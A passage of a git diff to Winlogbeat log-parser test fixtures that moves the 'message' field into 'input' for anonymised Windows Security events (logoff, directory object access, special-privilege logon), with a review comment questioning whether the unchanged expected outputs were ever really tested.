Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": 
"{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. 
Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount 
Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit 
Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\",\"5.6.7.8\"]}}", diff --git a/Beats/winlogbeat/tests/security_event_4662.json b/Beats/winlogbeat/tests/security_event_4662.json index 3d80320f5..3f1de8e53 100644 --- a/Beats/winlogbeat/tests/security_event_4662.json +++ b/Beats/winlogbeat/tests/security_event_4662.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s 
:\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", 
"dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s 
:\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}" + } }, "expected": { "message": 
"{\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T09:07:11.844Z\",\"message\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"tags\":[\"beats_input_codec_plain_applied\"],\"event\":{\"created\":\"2024-11-12T09:07:13.714Z\",\"action\":\"Directory Service Access\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"outcome\":\"success\",\"code\":\"4662\",\"original\":\"Une op\u00e9ration a \u00e9t\u00e9 effectu\u00e9e sur un objet.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0xC2B9D138\\n\\nObjet :\\n\\tServeur de l\u2019objet :\\t\\tDS\\n\\tType d\u2019objet :\\t\\t%{11111111-aaaa-2222-bbbb-333333333333}\\n\\tNom de l\u2019objet :\\t\\t%{12345678-abcd-ef90-1234-abcdef123456}\\n\\tID du handle :\\t\\t0x0\\n\\nOp\u00e9ration :\\n\\tType d\u2019op\u00e9ration :\\t\\tObject Access\\n\\tAcc\u00e8s :\\t\\tContr\u00f4ler l\u2019acc\u00e8s\\n\\t\\t\\t\\t\\n\\tMasque d\u2019acc\u00e8s :\\t\\t0x100\\n\\tPropri\u00e9t\u00e9s :\\t\\tContr\u00f4ler 
l\u2019acc\u00e8s\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\\n\\n\\nInformations suppl\u00e9mentaires :\\n\\tParam\u00e8tre 1:\\t\\t-\\n\\tParam\u00e8tre 2 :\\t\\t\",\"kind\":\"event\"},\"@version\":\"1\",\"agent\":{\"name\":\"ACCOUNT01\",\"ephemeral_id\":\"12345678-1234-5678-9012-345678901234\",\"type\":\"winlogbeat\",\"version\":\"8.12.2\",\"id\":\"abcdefab-cdef-abcd-efab-cdefabcdefab\"},\"host\":{\"hostname\":\"account01\",\"mac\":[\"00-11-22-33-44-55\"],\"architecture\":\"x86_64\",\"id\":\"11111111-2222-aaaa-bbbb-333333333333\",\"name\":\"account01\",\"ip\":[\"1.2.3.4\"],\"os\":{\"type\":\"windows\",\"build\":\"17763.6414\",\"name\":\"Windows Server 2019 Standard\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"version\":\"10.0\",\"family\":\"windows\"}},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"api\":\"wineventlog\",\"channel\":\"Security\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"task\":\"Directory Service Access\",\"process\":{\"pid\":744,\"thread\":{\"id\":864}},\"record_id\":476080242,\"event_id\":\"4662\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"opcode\":\"Informations\",\"computer_name\":\"ACCOUNT01.domain.local\",\"event_data\":{\"HandleId\":\"0x0\",\"SubjectLogonId\":\"0xc2b9d138\",\"ObjectType\":\"%{11111111-aaaa-2222-bbbb-333333333333}\",\"ObjectServer\":\"DS\",\"OperationType\":\"Object Access\",\"SubjectUserSid\":\"S-1-2-3\",\"AdditionalInfo\":\"-\",\"AccessMask\":\"0x100\",\"SubjectDomainName\":\"DOMAIN\",\"ObjectName\":\"%{12345678-abcd-ef90-1234-abcdef123456}\",\"SubjectUserName\":\"ACCOUNT01$\",\"AccessList\":\"%%7688\\n\\t\\t\\t\\t\",\"Properties\":\"%%7688\\n\\t\\t{abcdefab-1234-cdef-5678-901234abcdef}\\n\\t{11111111-aaaa-2222-bbbb-333333333333}\"}}}", 
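Review bot: The `expected` lines in this hunk are unchanged context, so the commit assumes the parser produces exactly the output the fixture already asserted once `message` is moved from the top level into `input`. If the test harness only reads `input.message`, these fixtures were previously run against an empty input and their `expected` blocks were never compared with real parser output; in that case they should be regenerated from the parser rather than carried over, and it is worth confirming that the suite fails on a deliberately wrong expected value after this change. The same key move, again with untouched `expected` context, appears in the security_event_4672, security_event_4689 and security_event_4720 hunks below. While these fixtures are being touched, note that the 4720 sample (agent 7.12.1) carries `event.code` and `winlog.event_id` as integers whereas the others carry them as strings, so keeping both shapes in the suite is useful coverage for the parser's type handling.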
diff --git a/Beats/winlogbeat/tests/security_event_4672.json b/Beats/winlogbeat/tests/security_event_4672.json index 59c3d35b3..ec935a02c 100644 --- a/Beats/winlogbeat/tests/security_event_4672.json +++ b/Beats/winlogbeat/tests/security_event_4672.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges 
:\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"host\":{\"name\":\"USER01-WIN.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Special Logon\",\"computer_name\":\"USER01-WIN.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"activity_id\":\"{abcdefab-1234-cdef-5678-901234abcdef}\",\"event_data\":{\"SubjectLogonId\":\"0x40c158b6\",\"PrivilegeList\":\"SeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"USER01-WIN$\",\"SubjectUserSid\":\"S-1-2-3\"},\"process\":{\"thread\":{\"id\":27812},\"pid\":828},\"event_id\":\"4672\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":288206963},\"@version\":\"1\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session 
:\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges :\\t\\tSeSecurityPrivilege\\n\\t\\t\\tSeBackupPrivilege\\n\\t\\t\\tSeRestorePrivilege\\n\\t\\t\\tSeTakeOwnershipPrivilege\\n\\t\\t\\tSeDebugPrivilege\\n\\t\\t\\tSeSystemEnvironmentPrivilege\\n\\t\\t\\tSeLoadDriverPrivilege\\n\\t\\t\\tSeImpersonatePrivilege\\n\\t\\t\\tSeDelegateSessionUserImpersonatePrivilege\",\"code\":\"4672\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:08:54.122Z\",\"action\":\"Special Logon\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:08:50.647Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Privil\u00e8ges sp\u00e9ciaux attribu\u00e9s \u00e0 la nouvelle ouverture de session.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tUSER01-WIN$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x40C158B6\\n\\nPrivil\u00e8ges 